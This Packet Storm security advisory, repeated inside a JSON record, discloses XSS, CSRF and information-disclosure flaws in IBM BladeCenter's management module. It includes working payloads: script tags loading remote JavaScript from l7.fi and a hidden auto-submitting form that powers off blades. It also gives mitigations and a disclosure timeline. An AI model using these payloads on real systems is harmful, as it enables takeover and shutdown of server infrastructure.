Search...

IBM BladeCenter Advanced Management XSS/XSRF

2009-04-09T00:00:00

ID PACKETSTORM:76505
Type packetstorm
Reporter Henri Lindberg
Modified 2009-04-09T00:00:00

Description

                                        
                                            ` Louhi Networks Information Security Research  
Security Advisory  
  
  
Advisory: IBM BladeCenter Advanced Management Module  
Multiple vulnerabilities  
(XSS type 2 & 1, CSRF, Information Disclosure)  
Release Date: 2009-04-09  
Last Modified: 2009-04-09  
Authors: Henri Lindberg [henri.lindberg@louhi.fi], CISA  
  
Device: IBM BladeCenter H AMM  
Main application: BPET36H  
Released: 03-20-08  
Rev: 54  
Risk: Low - Moderate  
High if Web Access is in active use and  
access to login page is unrestricted  
Vendor Status: Vendor notified, patch available.  
References: http://www.louhinetworks.fi/advisory/ibm_090409.txt  
  
Affected devices (from vendor):  
IBM BladeCenter E (1881, 7967, 8677)  
IBM BladeCenter H (7989, 8852)  
IBM BladeCenter HT (8740, 8750)  
IBM BladeCenter S (1948, 8886)  
IBM BladeCenter T (8720, 8730)  
IBM BladeCenter JS12 (7998)  
IBM BladeCenter JS21 (7988, 8844)  
IBM BladeCenter JS22 (7998)  
IBM BladeCenter HC10 (7996)  
IBM BladeCenter HS12 (8014, 1916, 8028)  
IBM BladeCenter HS20 (1883, 8843)  
IBM BladeCenter HS21 (8853, 1885)  
IBM BladeCenter HS21 XM (7995, 1915)  
IBM BladeCenter LS20 (8850)  
IBM BladeCenter LS21 (7971)  
IBM BladeCenter LS41 (7972)  
IBM BladeCenter QS21 (0792)  
IBM BladeCenter QS22 (0793)  
  
Overview:  
  
Quotes from  
  
http://www-03.ibm.com/systems/bladecenter/hardware/chassis/bladeh/index.html  
  
"In today’s high-demand enterprise environment, organizations  
need a reliable infrastructure to run compute-intensive  
applications with minimal maintenance and downtime.  
IBM BladeCenter H is a powerful platform built with the  
enterprise customer in mind, providing industry-leading performance,  
innovative architecture and a solid foundation for virtualization."  
  
"Provides easy integration to promote innovation and help manage  
growth, complexity and risk"  
  
During a quick overview of BladeCenter AMM web access, it was  
discovered that web administration interface has multiple  
vulnerabilities regarding input and request validation.  
  
Details:  
  
Cross Site Scripting  
====================  
  
Type 2:  
-------  
Most serious issue discovered was the persistent XSS  
vulnerability on the event log page resulting from  
displaying unsanitized user input received from an invalid  
login attempt.  
  
This can be exploited without valid credentials or social  
engineering. Access to device administration IP address is  
needed and an administrator has to view event log at some point,  
however.  
  
Successful attack requires that an administrator visits event  
log page, thus enabling the attacker to control the chassis  
and blade configuration by running the injected content which  
is interpreted by the administrator's browser.  
  
For example, all blades can be shut down or new admnistrative  
users can be added, depending on administrator's access rights.  
  
Unsuccessful login attempts are displayed without HTML encoding  
or input sanitation in the event log. It is possible to inject  
a reference to a remote javascript file by using eg following  
username:  
&lt;/script&gt;&lt;script src="//l7.fi"&gt;&lt;/script&gt;&lt;script&gt;  
  
Notes:  
If user input contains &lt;/script&gt;, dynamic javascript is spilled  
out on the page and it is quite easy to mess up formatting  
of the event log page.  
  
Log can be cleared by an authenticated administrator from URL:  
http://1.2.3.4/private/clearlog  
  
Event log javascript format:  
parent.LogEntryArray[i++] = new LogEntry( "1","2","Audit  
","SN#420420313370","09/09/08","04:20:42","Remote login failed  
for user '&lt;/script&gt;&lt;script src='//l7.fi'&gt;&lt;/script&gt;&lt;script&gt;' from  
Web at IP 1.2.3.4");  
  
HTML-injection can be performed for example with following  
"username": &lt;a href="private/clearlog"&gt;Mallory&lt;/a&gt;  
  
This results in:  
&lt;TD&gt;Remote login failed for user '&lt;a href='private/clearlog'&gt;  
Mallory&lt;/a&gt;' from Web at IP 1.2.3.4&lt;/TD&gt;  
  
Entries from event log are also displayed on the AMM Service  
Data page.  
  
Type 1:  
-------  
File manager displays user input on the page "as is".  
  
Successful exploitation requires social engineering  
an authenticated administrator to visit the hostile URL.  
  
Example URL:  
http://1.2.3.4/private/file_management.ssi?  
PATH=/etc"&gt;&lt;script%20src="http://l7.fi"&gt;&lt;/script&gt;  
  
Information Disclosure  
======================  
  
A readonly operator (for example, a Blade operator with  
a scope assigment to one Blade) can view security  
permissions of other users (access roles and scopes) by  
forcefully browsing to their respective login profile pages:  
  
http://1.2.3.4/private/login.ssi?WEBINDEX=&lt;n&gt;&JUNK=1  
where &lt;n&gt; is the assigned integer value (1..12) of the user  
account  
  
Cross Site Request Forgery  
==========================  
  
BladeCenter AMM does not validate the origin of an HTTP request.  
  
If attacker is able to lure or force an authenticated  
administrator to view malicious content, the Advanced Management  
Module web administration interface can be controlled by  
submitting suitable forms. Attacker is then effectively acting  
as an administrator.  
  
Successful attack requires that the attacker knows the management  
interface address for the target device.  
  
As the management interface allows "No session timeout" option,  
user can be vulnerable to this attack even after closing a tab  
containing the management interface, if cached authentication  
is not cleared from browser.  
  
Proof of Concept:  
-----------------  
Example form (Powers off Blades 1-4):  
  
&lt;html&gt;  
&lt;body onload="document.foobar.submit()"&gt;  
  
&lt;form name="foobar" method="post"  
action="http://1.2.3.4/private/blade_power_action"  
style="display:none"&gt;  
&lt;input name="COMMAND" value="6.3.2"&gt;  
&lt;input name="STATE" value="0"&gt;  
&lt;input name="CHECKED" value="15"&gt;  
&lt;input name="selall" value="on"&gt;  
&lt;input name="sel" value="bl1"&gt;  
&lt;input name="sel" value="bl2"&gt;  
&lt;input name="sel" value="bl3"&gt;  
&lt;input name="sel" value="bl4"&gt;  
&lt;input name="JUNK" value="1"&gt;  
  
&lt;/form&gt;  
&lt;body&gt;  
&lt;/html&gt;  
  
Summary:  
  
Further research on BladeCenter AMM is strongly encouraged as  
this brief overview touched only the surface of the device.  
  
Management module supports a variety of networking protocols  
and contains features also from Telco version. These can be  
found by reading the commented HTML-code. One example feature is  
http://1.2.3.4/private/get_telco_system_health_summary  
  
It is also apparent that session timeout is not enforced.  
  
More information:  
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076204&brandind=5000020  
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076206&brandind=5000020  
  
Mitigation:  
  
* Do not use Web Access for configuring the chassis and blades.  
* Limit access to web administration interface.  
* Do not use "No session timeout" option.  
* Always logout and close all browser windows after performing  
administrative tasks.  
* Do not browse untrusted sites while performing administrative  
tasks  
* Only grant access to web administration to trusted users  
  
Disclosure Timeline (highlights from the eight month effort):  
  
9. September 2008 - Contacted CERT-FI by email  
  
22. October 2008 - Provided IBM with a clarification  
why SSL usage does not fix CSRF  
vulnerability  
  
9. April 2009 - Advisory released  
  
  
"Replicants are like any other machine. They're either a benefit  
or a hazard. If they're a benefit, it's not my problem."  
-- Rick Deckard  
  
Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,  
no liabilities, information provided 'as is' for educational purposes.  
Reproduction allowed as long as credit is given. Information wants to  
be free.  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:76505", "type": "packetstorm", "bulletinFamily": "exploit", "title": "IBM BladeCenter Advanced Management XSS/XSRF", "description": "", "published": "2009-04-09T00:00:00", "modified": "2009-04-09T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/76505/IBM-BladeCenter-Advanced-Management-XSS-XSRF.html", "reporter": "Henri Lindberg", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:41", "viewCount": 0, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-11-03T10:16:41", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:41", "rev": 2}, "vulnersScore": 0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/76505/ibm_090409.txt", "sourceData": "` Louhi Networks Information Security Research \nSecurity Advisory \n \n \nAdvisory: IBM BladeCenter Advanced Management Module \nMultiple vulnerabilities \n(XSS type 2 & 1, CSRF, Information Disclosure) \nRelease Date: 2009-04-09 \nLast Modified: 2009-04-09 \nAuthors: Henri Lindberg [henri.lindberg@louhi.fi], CISA \n \nDevice: IBM BladeCenter H AMM \nMain application: BPET36H \nReleased: 03-20-08 \nRev: 54 \nRisk: Low - Moderate \nHigh if Web Access is in active use and \naccess to login page is unrestricted \nVendor Status: Vendor notified, patch available. \nReferences: http://www.louhinetworks.fi/advisory/ibm_090409.txt \n \nAffected devices (from vendor): \nIBM BladeCenter E (1881, 7967, 8677) \nIBM BladeCenter H (7989, 8852) \nIBM BladeCenter HT (8740, 8750) \nIBM BladeCenter S (1948, 8886) \nIBM BladeCenter T (8720, 8730) \nIBM BladeCenter JS12 (7998) \nIBM BladeCenter JS21 (7988, 8844) \nIBM BladeCenter JS22 (7998) \nIBM BladeCenter HC10 (7996) \nIBM BladeCenter HS12 (8014, 1916, 8028) \nIBM BladeCenter HS20 (1883, 8843) \nIBM BladeCenter HS21 (8853, 1885) \nIBM BladeCenter HS21 XM (7995, 1915) \nIBM BladeCenter LS20 (8850) \nIBM BladeCenter LS21 (7971) \nIBM BladeCenter LS41 (7972) \nIBM BladeCenter QS21 (0792) \nIBM BladeCenter QS22 (0793) \n \nOverview: \n \nQuotes from \n \nhttp://www-03.ibm.com/systems/bladecenter/hardware/chassis/bladeh/index.html \n \n\"In today\u2019s high-demand enterprise environment, organizations \nneed a reliable infrastructure to run compute-intensive \napplications with minimal maintenance and downtime. \nIBM BladeCenter H is a powerful platform built with the \nenterprise customer in mind, providing industry-leading performance, \ninnovative architecture and a solid foundation for virtualization.\" \n \n\"Provides easy integration to promote innovation and help manage \ngrowth, complexity and risk\" \n \nDuring a quick overview of BladeCenter AMM web access, it was \ndiscovered that web administration interface has multiple \nvulnerabilities regarding input and request validation. \n \nDetails: \n \nCross Site Scripting \n==================== \n \nType 2: \n------- \nMost serious issue discovered was the persistent XSS \nvulnerability on the event log page resulting from \ndisplaying unsanitized user input received from an invalid \nlogin attempt. \n \nThis can be exploited without valid credentials or social \nengineering. Access to device administration IP address is \nneeded and an administrator has to view event log at some point, \nhowever. \n \nSuccessful attack requires that an administrator visits event \nlog page, thus enabling the attacker to control the chassis \nand blade configuration by running the injected content which \nis interpreted by the administrator's browser. \n \nFor example, all blades can be shut down or new admnistrative \nusers can be added, depending on administrator's access rights. \n \nUnsuccessful login attempts are displayed without HTML encoding \nor input sanitation in the event log. It is possible to inject \na reference to a remote javascript file by using eg following \nusername: \n</script><script src=\"//l7.fi\"></script><script> \n \nNotes: \nIf user input contains </script>, dynamic javascript is spilled \nout on the page and it is quite easy to mess up formatting \nof the event log page. \n \nLog can be cleared by an authenticated administrator from URL: \nhttp://1.2.3.4/private/clearlog \n \nEvent log javascript format: \nparent.LogEntryArray[i++] = new LogEntry( \"1\",\"2\",\"Audit \n\",\"SN#420420313370\",\"09/09/08\",\"04:20:42\",\"Remote login failed \nfor user '</script><script src='//l7.fi'></script><script>' from \nWeb at IP 1.2.3.4\"); \n \nHTML-injection can be performed for example with following \n\"username\": <a href=\"private/clearlog\">Mallory</a> \n \nThis results in: \n<TD>Remote login failed for user '<a href='private/clearlog'> \nMallory</a>' from Web at IP 1.2.3.4</TD> \n \nEntries from event log are also displayed on the AMM Service \nData page. \n \nType 1: \n------- \nFile manager displays user input on the page \"as is\". \n \nSuccessful exploitation requires social engineering \nan authenticated administrator to visit the hostile URL. \n \nExample URL: \nhttp://1.2.3.4/private/file_management.ssi? \nPATH=/etc\"><script%20src=\"http://l7.fi\"></script> \n \nInformation Disclosure \n====================== \n \nA readonly operator (for example, a Blade operator with \na scope assigment to one Blade) can view security \npermissions of other users (access roles and scopes) by \nforcefully browsing to their respective login profile pages: \n \nhttp://1.2.3.4/private/login.ssi?WEBINDEX=<n>&JUNK=1 \nwhere <n> is the assigned integer value (1..12) of the user \naccount \n \nCross Site Request Forgery \n========================== \n \nBladeCenter AMM does not validate the origin of an HTTP request. \n \nIf attacker is able to lure or force an authenticated \nadministrator to view malicious content, the Advanced Management \nModule web administration interface can be controlled by \nsubmitting suitable forms. Attacker is then effectively acting \nas an administrator. \n \nSuccessful attack requires that the attacker knows the management \ninterface address for the target device. \n \nAs the management interface allows \"No session timeout\" option, \nuser can be vulnerable to this attack even after closing a tab \ncontaining the management interface, if cached authentication \nis not cleared from browser. \n \nProof of Concept: \n----------------- \nExample form (Powers off Blades 1-4): \n \n<html> \n<body onload=\"document.foobar.submit()\"> \n \n<form name=\"foobar\" method=\"post\" \naction=\"http://1.2.3.4/private/blade_power_action\" \nstyle=\"display:none\"> \n<input name=\"COMMAND\" value=\"6.3.2\"> \n<input name=\"STATE\" value=\"0\"> \n<input name=\"CHECKED\" value=\"15\"> \n<input name=\"selall\" value=\"on\"> \n<input name=\"sel\" value=\"bl1\"> \n<input name=\"sel\" value=\"bl2\"> \n<input name=\"sel\" value=\"bl3\"> \n<input name=\"sel\" value=\"bl4\"> \n<input name=\"JUNK\" value=\"1\"> \n \n</form> \n<body> \n</html> \n \nSummary: \n \nFurther research on BladeCenter AMM is strongly encouraged as \nthis brief overview touched only the surface of the device. \n \nManagement module supports a variety of networking protocols \nand contains features also from Telco version. These can be \nfound by reading the commented HTML-code. One example feature is \nhttp://1.2.3.4/private/get_telco_system_health_summary \n \nIt is also apparent that session timeout is not enforced. \n \nMore information: \nhttp://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076204&brandind=5000020 \nhttp://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076206&brandind=5000020 \n \nMitigation: \n \n* Do not use Web Access for configuring the chassis and blades. \n* Limit access to web administration interface. \n* Do not use \"No session timeout\" option. \n* Always logout and close all browser windows after performing \nadministrative tasks. \n* Do not browse untrusted sites while performing administrative \ntasks \n* Only grant access to web administration to trusted users \n \nDisclosure Timeline (highlights from the eight month effort): \n \n9. September 2008 - Contacted CERT-FI by email \n \n22. October 2008 - Provided IBM with a clarification \nwhy SSL usage does not fix CSRF \nvulnerability \n \n9. April 2009 - Advisory released \n \n \n\"Replicants are like any other machine. They're either a benefit \nor a hazard. If they're a benefit, it's not my problem.\" \n-- Rick Deckard \n \nCopyright 2009 Louhi Networks Oy. All rights reserved. No warranties, \nno liabilities, information provided 'as is' for educational purposes. \nReproduction allowed as long as credit is given. Information wants to \nbe free. \n`\n", "immutableFields": []}